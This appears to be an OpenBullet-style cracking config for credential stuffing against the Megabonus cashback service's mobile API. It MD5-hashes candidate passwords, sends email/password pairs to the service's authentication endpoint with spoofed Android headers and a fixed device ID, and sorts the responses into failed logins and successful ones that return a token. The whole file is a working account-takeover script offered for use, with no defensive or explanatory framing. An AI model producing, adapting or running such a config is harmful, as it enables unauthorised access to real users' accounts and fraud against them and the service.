[SETTINGS]
{
  "Name": "Mega Bonus {CASHBACK}",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-10-24T05:01:39.3749804-07:00",
  "AdditionalInfo": "@MasterLord007",
  "RequiredPlugins": [],
  "Author": "@MasterLordConfigs",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#PASS FUNCTION Hash MD5 "<PASS>" -> VAR "PS" 

#LOGIN REQUEST POST "https://apimob.megabonus.com/4_1/authen" 
  CONTENT "{\"device\":\"android\",\"email\":\"<USER>\",\"imei\":\"fe8bd62bp39h682b\",\"lang\":\"en\",\"notif_token\":null,\"password\":\"<PS>\",\"request_type\":\"authentication\",\"social_network_type\":\"default\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: apimob.megabonus.com" 
  HEADER "User-Agent: 10X - 7.1.2" 
  HEADER "Content-Type: application/json; charset=UTF-8" 
  HEADER "Content-Length: 253" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Connection: close" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "wrong_email_password" 
    KEY "wrong_email" 
  KEYCHAIN Success OR 
    KEY "token" 

#CREATOR FUNCTION Constant "@MasterLordConfigs" -> CAP "Config By" 

